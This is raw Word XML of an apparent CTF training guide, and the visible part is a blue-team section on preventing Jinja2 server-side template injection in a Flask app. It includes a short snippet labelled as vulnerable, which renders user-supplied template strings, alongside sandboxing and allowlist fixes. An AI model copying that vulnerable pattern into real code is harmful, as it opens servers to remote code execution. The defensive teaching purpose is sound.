          <w:iCs w:val="false"/>
          <w:color w:val="1A7A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔵  BLUE TEAM — DEFENCE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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Never render user-supplied templates — use static templates with variable substitution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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The root fix: templates must be static files written by developers, never user input.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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User data belongs in the template context (variables), not in the template itself.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># VULNERABLE:
env = Environment()
tmpl = env.from_string(user_supplied_template)  # user controls template!
rendered = tmpl.render(**context)
# FIXED — template is static, only context is user-supplied:
# Templates are .html files in /templates/ directory
# User can only control the variable VALUES, not the template structure:
@app.route("/api/notifications/preview", methods=["POST"])
def ssti_fixed():
    u = jwt_user()
    d = request.get_json()
    template_name = d.get("template_id", "")  # ID, not raw template!
    context = d.get("context", {})  # sanitise keys
    # Only allow pre-approved templates:
    ALLOWED = {"welcome", "alert", "reminder", "report"}
    if template_name not in ALLOWED:
        return jsonify({"error": "Invalid template"}), 400
    rendered = render_template(f"notifications/{template_name}.html", **context)
    return jsonify({"preview": rendered})</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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">If dynamic templates are needed — use Jinja2 SandboxedEnvironment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Jinja2 provides a SandboxedEnvironment that blocks access to dangerous attributes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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It prevents __class__, __mro__, and other Python internals from being accessed.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Use SandboxedEnvironment:
from jinja2.sandbox import SandboxedEnvironment
env  = SandboxedEnvironment()  # blocks __class__, __mro__, etc.
tmpl = env.from_string(user_template)
try:
    rendered = tmpl.render(**safe_context)
except jinja2.exceptions.SecurityError as e:
    return jsonify({"error": "Template contains restricted code"}), 400</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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Sanitise template context — prevent context variable abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Even with sandbox, be careful what you pass in context.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Never pass request, config, g, or session objects to user templates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F8F9FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="7F8C8D"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Allowlist permitted context keys: only primitive types (str, int, list of strs).</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Sanitise context before rendering:
def safe_context(raw_ctx):
    ALLOWED_KEYS = {"name", "company", "date", "message", "amount"}
    return {
        k: str(v)[:500]  # force string, limit length
        for k, v in raw_ctx.items()
        if k in ALLOWED_KEYS and isinstance(v, (str, int, float))
    }</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A6F1E" w:sz="1"/>
              <w:left w:val="single" w:color="CA6F1E" w:sz="14"/>
              <w:bottom w:val="single" w:color="CA6F1E" w:sz="1"/>
              <w:right w:val="single" w:color="CA6F1E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="CA6F1E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  Real-World Impact</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SSTI was used in critical breaches at Uber (2016), and multiple bug bounty programs pay $5k-$50k for SSTI findings. Unlike client-side injection (XSS), SSTI runs on the server — instant RCE with server privileges. Twig, Smarty, Freemarker, Velocity, ERB all have SSTI variants.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C8D6E5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="40" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:head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none"/>
        <w:left w:val="none"/>
        <w:bottom w:val="single" w:color="B7950B" w:sz="4"/>
        <w:right w:val="none"/>
        <w:insideH w:val="single" w:color="auto" w:sz="4"/>
        <w:insideV w:val="single" w:color="auto" w:sz="4"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="5000"/>
      <w:gridCol w:w="4720"/>
    </w:tblGrid>
    <w:tr>
      <w:tc>
        <w:tcPr>
          <w:tcBorders>
            <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
            <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
            <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
            <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:spacing w:before="0" w:after="120" w:line="276"/>
            <w:jc w:val="left"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="0B1929"/>
              <w:sz w:val="17"/>
              <w:szCs w:val="17"/>
            </w:rPr>
            <w:t xml:space="preserve">NexusCore Technologies CTF — Round 2 Guide</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcBorders>
            <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
            <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
            <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
            <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:spacing w:before="0" w:after="120" w:line="276"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
              <w:i/>
              <w:iCs/>
              <w:color w:val="7F8C8D"/>
              <w:sz w:val="15"/>
              <w:szCs w:val="15"/>
            </w:rPr>
            <w:t xml:space="preserve">CONFIDENTIAL — CTF Use Only</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0B1929"/>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0B1929"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="220" w:after="110"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4D5D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2026-03-07T06:02:06.643Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-07T06:02:06.644Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>